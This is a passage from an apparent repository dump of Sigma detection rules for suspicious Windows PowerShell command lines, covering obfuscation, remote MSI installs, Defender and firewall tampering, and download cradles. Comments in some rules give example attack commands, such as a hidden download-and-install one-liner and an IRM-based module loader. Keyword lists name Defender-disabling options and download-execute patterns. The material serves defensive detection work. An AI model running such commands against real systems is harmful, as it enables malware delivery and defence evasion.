'ptth'\n            - 'elifotevas'\n            - '46esab'\n            - 'htaPpmeTteG'\n            - 'tcejbO'\n            - 'maerts'\n            - 'hcaerof'\n            - 'retupmoc'\n    filter_main_encoded_keyword:\n        # We exclude usage of encoded commands as they might generate FPs as shown here:\n        #   https://github.com/SigmaHQ/sigma/pull/2720\n        #   https://github.com/SigmaHQ/sigma/issues/4270\n        CommandLine|contains:\n            - ' -EncodedCommand '\n            - ' -enc '\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml",
    "content": "title: Potential PowerShell Command Line Obfuscation\nid: d7bcd677-645d-4691-a8d4-7a5602b780d1\nstatus: test\ndescription: Detects the PowerShell command lines with special characters\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)\ndate: 2020-10-15\nmodified: 2024-04-15\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_re:\n        # TODO: Optimize for PySIGMA\n        - CommandLine|re: '\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+'\n        - CommandLine|re: '\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{'\n        - CommandLine|re: '\\^.*\\^.*\\^.*\\^.*\\^'\n        - CommandLine|re: '`.*`.*`.*`.*`'\n    filter_optional_amazonSSM:\n        ParentImage: C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe\n    filter_optional_defender_atp:\n        CommandLine|contains:\n            - 'new EventSource(\"Microsoft.Windows.Sense.Client.Management\"'\n            - 'public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Amazon SSM Document Worker\n    - Windows Defender ATP\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_comobject_msi.yml",
    "content": "title: Obfuscated PowerShell MSI Install via WindowsInstaller COM\nid: 7b6a7418-3afc-11f0-aff4-000d3abf478c\nstatus: experimental\ndescription: |\n    Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).\n    The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting\n    malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection\n    by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with\n    hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.\nreferences:\n    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/\n    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/\n    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457\nauthor: Meroujan Antonyan (vx3r)\ndate: 2025-05-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027.010\n    - attack.t1218.007\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: \"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -W Hidden -C \"$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')\";\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-ComObject'\n            - 'InstallProduct('\n            - '.Insert('\n            - 'UILevel'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml",
    "content": "title: PowerShell MSI Install via WindowsInstaller COM From Remote Location\nid: 222720a7-047f-4054-baa5-bab9be757db0\nstatus: experimental\ndescription: |\n    Detects the execution of PowerShell commands that attempt to install MSI packages via the\n    Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.\n    This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.\n    And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.\nreferences:\n    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/\n    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/\n    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457\nauthor: Meroujan Antonyan (vx3r)\ndate: 2025-06-05\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: \"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -W Hidden -C \"$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u),'')\";\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-ComObject'\n            - 'InstallProduct('\n    selection_remote:\n        CommandLine|contains:\n            - 'http'\n            - '\\\\\\\\'\n    filter_main_localhost:\n        CommandLine|contains:\n            - '://127.0.0.1'\n            - '://localhost'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml",
    "content": "title: Computer Discovery And Export Via Get-ADComputer Cmdlet\nid: 435e10e4-992a-4281-96f3-38b11106adde\nrelated:\n    - id: db885529-903f-4c5d-9864-28fe199e6370\n      type: similar\nstatus: test\ndescription: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\n    - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-10\nmodified: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'Get-ADComputer '\n            - ' -Filter \\*'\n        CommandLine|contains:\n            - ' > '\n            - ' | Select '\n            - 'Out-File'\n            - 'Set-Content'\n            - 'Add-Content'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_console_history_file_access.yml",
    "content": "title: Potential PowerShell Console History Access Attempt via History File\nid: f4ff7323-b5fc-4323-8b52-6b9408e15788\nstatus: experimental\ndescription: |\n    Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).\n    This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.\nreferences:\n    - https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html\nauthor: Luc Génaux\ndate: 2025-04-03\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'ConsoleHost_history.txt'\n            - '(Get-PSReadLineOption).HistorySavePath'\n    condition: selection\nfalsepositives:\n    - Legitimate access of the console history file is possible\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_create_service.yml",
    "content": "title: New Service Creation Using PowerShell\nid: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2\nrelated:\n    - id: 85ff530b-261d-48c6-a441-facaa2e81e48 # Using Sc.EXE\n      type: similar\nstatus: test\ndescription: Detects the creation of a new service using powershell.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2023-02-20\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'New-Service'\n            - '-BinaryPathName'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator or user creates a service for legitimate reasons.\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml",
    "content": "title: Gzip Archive Decode Via PowerShell\nid: 98767d61-b2e8-4d71-b661-e36783ee24c1\nstatus: test\ndescription: Detects attempts of decoding encoded Gzip archives via PowerShell.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: Hieu Tran\ndate: 2023-03-13\ntags:\n    - attack.command-and-control\n    - attack.t1132.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'GZipStream'\n            - '::Decompress'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml",
    "content": "title: PowerShell Execution With Potential Decryption Capabilities\nid: 434c08ba-8406-4d15-8b24-782cb071a691\nstatus: test\ndescription: Detects PowerShell commands that decrypt an \".LNK\" \"file to drop the next stage of the malware.\nreferences:\n    - https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-30\nmodified: 2023-12-05\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        OriginalFileName:\n            - 'PowerShell.EXE'\n            - 'pwsh.dll'\n    selection_cli_dir:\n        CommandLine|contains:\n            - \"Get-ChildItem \"\n            - \"dir \"\n            - \"gci \"\n            - \"ls \"\n    selection_cli_gc:\n        CommandLine|contains:\n            - \"Get-Content \"\n            - \"gc \"\n            - 'cat '\n            - 'type '\n            - 'ReadAllBytes'\n    selection_cli_specific:\n        - CommandLine|contains|all:\n              - ' ^| '\n              - '\\*.lnk'\n              - '-Recurse'\n              - '-Skip '\n        - CommandLine|contains|all:\n              - ' -ExpandProperty '\n              - '\\*.lnk'\n              - 'WriteAllBytes'\n              - ' .length '\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml",
    "content": "title: Powershell Defender Disable Scan Feature\nid: 1ec65a5f-9473-4f12-97da-622044d6df21\nstatus: test\ndescription: Detects requests to disable Microsoft Defender features using PowerShell commands\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps\n    - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE\n    - https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-03\nmodified: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli_cmdlet:\n        CommandLine|contains:\n            - 'Add-MpPreference '\n            - 'Set-MpPreference '\n    selection_cli_option:\n        CommandLine|contains:\n            - 'DisableArchiveScanning '\n            - 'DisableRealtimeMonitoring '\n            - 'DisableIOAVProtection '\n            - 'DisableBehaviorMonitoring '\n            - 'DisableBlockAtFirstSeen '\n            - 'DisableCatchupFullScan '\n            - 'DisableCatchupQuickScan '\n    selection_cli_value:\n        CommandLine|contains:\n            - '$true'\n            - ' 1 '\n    selection_encoded_modifier:\n        CommandLine|base64offset|contains:\n            # Note: Since this is calculating offsets casing is important\n            - 'disablearchivescanning '\n            - 'DisableArchiveScanning '\n            - 'disablebehaviormonitoring '\n            - 'DisableBehaviorMonitoring '\n            - 'disableblockatfirstseen '\n            - 'DisableBlockAtFirstSeen '\n            - 'disablecatchupfullscan '\n            - 'DisableCatchupFullScan '\n            - 'disablecatchupquickscan '\n            - 'DisableCatchupQuickScan '\n            - 'disableioavprotection '\n            - 'DisableIOAVProtection '\n            - 'disablerealtimemonitoring '\n            - 'DisableRealtimeMonitoring '\n    selection_encoded_direct:\n        CommandLine|contains:\n            - 'RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'\n            - 'QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'\n            - 'EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA'\n            - 'RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA'\n            - 'QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA'\n            - 'EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA'\n            - 'RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'\n            - 'QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'\n            - 'EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA'\n            - 'RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA'\n            - 'QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA'\n            - 'EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA'\n            - 'ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'\n            - 'QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'\n            - 'kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA'\n            - 'ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA'\n            - 'QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA'\n            - 'kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA'\n            - 'ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'\n            - 'QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'\n            - 'kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA'\n            - 'ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA'\n            - 'QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA'\n            - 'kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA'\n            - 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA'\n            - 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA'\n            - 'RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA'\n    condition: all of selection_cli_* or 1 of selection_encoded_*\nfalsepositives:\n    - Possible administrative activity\n    - Other Cmdlets that may use the same parameters\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml",
    "content": "title: Powershell Defender Exclusion\nid: 17769c90-230e-488b-a463-e05c08e9d48f\nrelated:\n    - id: c1344fa2-323b-4d2e-9176-84b4d4821c88\n      type: similar\nstatus: test\ndescription: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://twitter.com/AdamTheAnalyst/status/1483497517119590403\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-04-29\nmodified: 2022-05-12\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'Add-MpPreference '\n            - 'Set-MpPreference '\n    selection2:\n        CommandLine|contains:\n            - ' -ExclusionPath '\n            - ' -ExclusionExtension '\n            - ' -ExclusionProcess '\n            - ' -ExclusionIpAddress '\n    condition: all of selection*\nfalsepositives:\n    - Possible Admin Activity\n    - Other Cmdlets that may use the same parameters\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml",
    "content": "title: Disable Windows Defender AV Security Monitoring\nid: a7ee1722-c3c5-aeff-3212-c777e4733217\nstatus: test\ndescription: Detects attackers attempting to disable Windows Defender using Powershell\nreferences:\n    - https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/\n    - https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: 'ok @securonix invrep-de, oscd.community, frack113'\ndate: 2020-10-12\nmodified: 2022-11-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pwsh_binary:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_pwsh_cli:\n        CommandLine|contains:\n            - '-DisableBehaviorMonitoring $true'\n            - '-DisableRuntimeMonitoring $true'\n    selection_sc_binary:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_sc_tamper_cmd_stop:\n        CommandLine|contains|all:\n            - 'stop'\n            - 'WinDefend'\n    selection_sc_tamper_cmd_delete:\n        CommandLine|contains|all:\n            - 'delete'\n            - 'WinDefend'\n    selection_sc_tamper_cmd_disabled:\n        CommandLine|contains|all:\n            - 'config'\n            - 'WinDefend'\n            - 'start=disabled'\n    condition: all of selection_pwsh_* or (selection_sc_binary and 1 of selection_sc_tamper_*)\nfalsepositives:\n    - 'Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.'\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_disable_firewall.yml",
    "content": "title: Windows Firewall Disabled via PowerShell\nid: 12f6b752-042d-483e-bf9c-915a6d06ad75\nrelated:\n    - id: 488b44e7-3781-4a71-888d-c95abfacf44d\n      type: similar\nstatus: test\ndescription: Detects attempts to disable the Windows Firewall using PowerShell\nreferences:\n    - https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-14\nmodified: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\powershell_ise.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_args:\n        CommandLine|contains|all:\n            - 'Set-NetFirewallProfile '\n            - ' -Enabled '\n            - ' False'\n    selection_opt:\n        CommandLine|contains:\n            - ' -All '\n            - 'Public'\n            - 'Domain'\n            - 'Private'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_disable_ie_features.yml",
    "content": "title: Disabled IE Security Features\nid: fb50eb7a-5ab1-43ae-bcc9-091818cb8424\nstatus: test\ndescription: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features\nreferences:\n    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-06-19\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains|all:\n            - ' -name IEHarden '\n            - ' -value 0 '\n    selection2:\n        CommandLine|contains|all:\n            - ' -name DEPOff '\n            - ' -value 1 '\n    selection3:\n        CommandLine|contains|all:\n            - ' -name DisableFirstRunCustomize '\n            - ' -value 2 '\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml",
    "content": "title: Potential PowerShell Downgrade Attack\nid: b3512211-c67e-4707-bedc-66efc7848863\nrelated:\n    - id: 6331d09b-4785-4c13-980f-f96661356249\n      type: derived\nstatus: test\ndescription: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0\nreferences:\n    - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/\n    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-\nauthor: Harish Segar (rule)\ndate: 2020-03-20\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\powershell.exe'\n        CommandLine|contains:\n            - ' -version 2 '\n            - ' -versio 2 '\n            - ' -versi 2 '\n            - ' -vers 2 '\n            - ' -ver 2 '\n            - ' -ve 2 '\n            - ' -v 2 '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml",
    "content": "title: Potential COM Objects Download Cradles Usage - Process Creation\nid: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf\nrelated:\n    - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe\n      type: similar\nstatus: test\ndescription: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57\nauthor: frack113\ndate: 2022-12-25\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_1:\n        CommandLine|contains: '[Type]::GetTypeFromCLSID('\n    selection_2:\n        CommandLine|contains:\n            - '0002DF01-0000-0000-C000-000000000046'\n            - 'F6D90F16-9C73-11D3-B32E-00C04F990BB4'\n            - 'F5078F35-C551-11D3-89B9-0000F81FE221'\n            - '88d96a0a-f192-11d4-a65f-0040963251e5'\n            - 'AFBA6B42-5692-48EA-8141-DC517DCF0EF1'\n            - 'AFB40FFD-B609-40A3-9828-F88BBE11E4E3'\n            - '88d96a0b-f192-11d4-a65f-0040963251e5'\n            - '2087c2f4-2cef-4953-a8ab-66779b670495'\n            - '000209FF-0000-0000-C000-000000000046'\n            - '00024500-0000-0000-C000-000000000046'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_cradle_obfuscated.yml",
    "content": "title: Obfuscated PowerShell OneLiner Execution\nid: 44e24481-6202-4c62-9127-5a0ae8e3fe3d\nstatus: test\ndescription: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.\nreferences:\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\n    - https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38\nauthor: '@Kostastsale, TheDFIRReport'\ndate: 2022-05-09\nmodified: 2025-04-16\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        # Example: powershell -nop -noni -ep bypass -w h -c \"$u=(\"http://127.0.0.1:1337/\"|%%{(IRM $_)});&(\"\".SubString.ToString()[67,72,64]-Join\"\")($u); Import-Module C:\\Users\\EXAMPLE\\Invoke-WMIExec.ps1; Invoke-WMIExec\"\n        Image|endswith: '\\powershell.exe'\n        CommandLine|contains|all:\n            - 'http://127.0.0.1'\n            - '%{(IRM $_)}'\n            - 'Invoke'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml",
    "content": "title: Potential DLL File Download Via PowerShell Invoke-WebRequest\nid: 0f0450f3-8b47-441e-a31b-15a91dc243e2\nstatus: test\ndescription: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: Florian Roth (Nextron Systems), Hieu Tran\ndate: 2023-03-13\nmodified: 2025-07-18\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1105\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Invoke-RestMethod '\n            - 'Invoke-WebRequest '\n            - 'IRM '\n            - 'IWR '\n        CommandLine|contains|all:\n            - 'http'\n            - 'OutFile'\n            - '.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml",
    "content": "title: PowerShell Download and Execution Cradles\nid: 85b0b087-eddf-4a2b-b033-d771fa2b9775\nstatus: test\ndescription: Detects PowerShell download and execution cradles.\nreferences:\n    - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-24\nmodified: 2025-07-18\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_download:\n        CommandLine|contains:\n            - '.DownloadString('\n            - '.DownloadFile('\n            - 'Invoke-WebRequest '\n            - 'iwr '\n            - 'Invoke-RestMethod '\n            - 'irm '  # powershell -ep bypass -w h -c irm test.domain/ffe | iex\n    selection_iex:\n        CommandLine|contains:\n            - ';iex $'\n            - '| IEX'\n            - '|IEX '\n            - 'I`E`X'\n            - 'I`EX'\n            - 'IE`X'\n            - 'iex '\n            - 'IEX ('\n            - 'IEX('\n            - 'Invoke-Expression'\n    condition: all of selection_*\nfalsepositives:\n    - Some PowerShell installers were seen using similar combinations. Apply filters accordingly\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml",
